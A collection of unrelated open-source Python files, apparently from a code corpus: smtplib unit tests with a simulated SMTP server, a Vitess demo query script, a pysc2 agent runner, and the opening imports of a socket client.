@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
thread = threading.Thread(target=server, args=servargs)
thread.start()
self.addCleanup(thread.join)
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3
)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
data.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The Vitess Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module allows you to bring up and tear down keyspaces."""
import cgi
import decimal
import json
import subprocess
import threading
import time
from vtdb import keyrange
from vtdb import vtgate_client
# TODO(sougou): remove this import once the deps are fixed
import google.protobuf
from vtdb import grpc_vtgate_client # pylint: disable=unused-import
def exec_query(conn, title, query, response, keyspace=None, kr=None): # pylint: disable=missing-docstring
if kr:
# v2 cursor to address individual shards directly, for debug display
cursor = conn.cursor(
tablet_type="master", keyspace=keyspace,
keyranges=[keyrange.KeyRange(kr)])
else:
# v3 cursor is automated
cursor = conn.cursor(
tablet_type="master", keyspace=keyspace, writable=True)
try:
if not query or query == "undefined":
return
if query.startswith("select"):
cursor.execute(query, {})
else:
cursor.begin()
cursor.execute(query, {})
cursor.commit()
response[title] = {
"title": title,
"description": cursor.description,
"rowcount": cursor.rowcount,
"lastrowid": cursor.lastrowid,
"results": cursor.results,
}
cursor.close()
except Exception as e: # pylint: disable=broad-except
response[title] = {
"title": title,
"error": str(e),
}
cursor.rollback()
cursor.close()
def capture_log(port, queries): # pylint: disable=missing-docstring
p = subprocess.Popen(
["curl", "-s", "-N", "http://localhost:%d/debug/querylog" % port],
stdout=subprocess.PIPE)
def collect():
for line in iter(p.stdout.readline, ""):
query = line.split("\t")[12].strip('"')
if not query:
continue
queries.append(query)
t = threading.Thread(target=collect)
t.daemon = True
t.start()
return p
def main():
print "Content-Type: application/json\n"
try:
conn = vtgate_client.connect("grpc", "localhost:12346", 10.0)
args = cgi.FieldStorage()
query = args.getvalue("query")
response = {}
try:
queries = []
stats = capture_log(12345, queries)
time.sleep(0.25)
exec_query(conn, "result", query, response)
finally:
stats.terminate()
time.sleep(0.25)
response["queries"] = queries
# user table
exec_query(
conn, "user0",
"select * from user", response, keyspace="user", kr="-80")
exec_query(
conn, "user1",
"select * from user", response, keyspace="user", kr="80-")
# user_extra table
exec_query(
conn, "user_extra0",
"select * from user_extra", response, keyspace="user", kr="-80")
exec_query(
conn, "user_extra1",
"select * from user_extra", response, keyspace="user", kr="80-")
# music table
exec_query(
conn, "music0",
"select * from music", response, keyspace="user", kr="-80")
exec_query(
conn, "music1",
"select * from music", response, keyspace="user", kr="80-")
# music_extra table
exec_query(
conn, "music_extra0",
"select * from music_extra", response, keyspace="user", kr="-80")
exec_query(
conn, "music_extra1",
"select * from music_extra", response, keyspace="user", kr="80-")
# name_info table
exec_query(
conn, "name_info0",
"select * from name_info", response, keyspace="user", kr="-80")
exec_query(
conn, "name_info1",
"select * from name_info", response, keyspace="user", kr="80-")
# music_keyspace_idx table
exec_query(
conn, "music_keyspace_idx0",
"select music_id, hex(keyspace_id) from music_keyspace_idx", response, keyspace="user", kr="-80")
exec_query(
conn, "music_keyspace_idx1",
"select music_id, hex(keyspace_id) from music_keyspace_idx", response, keyspace="user", kr="80-")
# lookup tables
exec_query(
conn, "user_seq", "select * from user_seq", response,
keyspace="lookup", kr="-")
exec_query(
conn, "music_seq", "select * from music_seq", response,
keyspace="lookup", kr="-")
exec_query(
conn, "name_keyspace_idx", "select name, hex(keyspace_id) from name_keyspace_idx", response,
keyspace="lookup", kr="-")
print json.dumps(response, default=decimal_default)
except Exception as e: # pylint: disable=broad-except
print json.dumps({"error": str(e)})
def decimal_default(obj):
"""Provide json-encodable conversion for decimal.Decimal type.
json encoding fails on decimal.Decimal. This
function converts the decimal into a float object
which json knows how to encode.
"""
if isinstance(obj, decimal.Decimal):
return float(obj)
raise TypeError
if __name__ == "__main__":
main()
|
agent.py | #!/usr/bin/python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run an agent."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import threading
from future.builtins import range # pylint: disable=redefined-builtin
from pysc2 import maps
from pysc2.env import available_actions_printer
from pysc2.env import run_loop
from pysc2.env import sc2_env
from pysc2.lib import stopwatch
from pysc2.lib import app
import gflags as flags
FLAGS = flags.FLAGS
flags.DEFINE_bool("render", True, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 84,
"Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64,
"Resolution for minimap feature layers.")
flags.DEFINE_integer("max_agent_steps", 2500, "Total agent steps.")
flags.DEFINE_integer("game_steps_per_episode", 0, "Game steps per episode.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_string("agent", "pysc2.agents.random_agent.RandomAgent",
"Which agent to run")
flags.DEFINE_enum("agent_race", None, sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", None, sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", None, sc2_env.difficulties.keys(),
"Bot's strength.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_integer("parallel", 1, "How many instances to run in parallel.")
flags.DEFINE_bool("save_replay", False, "Whether to save a replay at the end.")
flags.DEFINE_string("map", None, "Name of a map to use.")
flags.mark_flag_as_required("map")
def run_thread(agent_cls, map_name, visualize):
with sc2_env.SC2Env(
map_name=map_name,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=FLAGS.difficulty,
step_mul=FLAGS.step_mul,
game_steps_per_episode=FLAGS.game_steps_per_episode,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=visualize) as env:
env = available_actions_printer.AvailableActionsPrinter(env)
agent = agent_cls()
run_loop.run_loop([agent], env, FLAGS.max_agent_steps)
if FLAGS.save_replay:
env.save_replay(agent_cls.__name__)
def main(unused_argv):
"""Run an agent."""
stopwatch.sw.enabled = FLAGS.profile or FLAGS.trace
stopwatch.sw.trace = FLAGS.trace
maps.get(FLAGS.map) # Assert the map exists.
agent_module, agent_name = FLAGS.agent.rsplit(".", 1)
agent_cls = getattr(importlib.import_module(agent_module), agent_name)
threads = []
for _ in range(FLAGS.parallel - 1):
t = threading.Thread(target=run_thread, args=(agent_cls, FLAGS.map, False))
threads.append(t)
t.start()
run_thread(agent_cls, FLAGS.map, FLAGS.render)
for t in threads:
t.join()
if FLAGS.profile:
print(stopwatch.sw)
def entry_point(): # Needed so setup.py scripts work.
app.run(main)
if __name__ == "__main__":
app.run(main)
|
client.py | #!/bin/env python
# import proto_message as message
import socket
import os
import sys
import struct
import threading
import select
import time
import socks
# import time
import request_pb2
from config import client_address, \
client_id, \
RL, \
client_logger, \
config_general
# N, TOR_SOCKSPORT
kill_flag = False
start_time = 0
def recv_response(n):
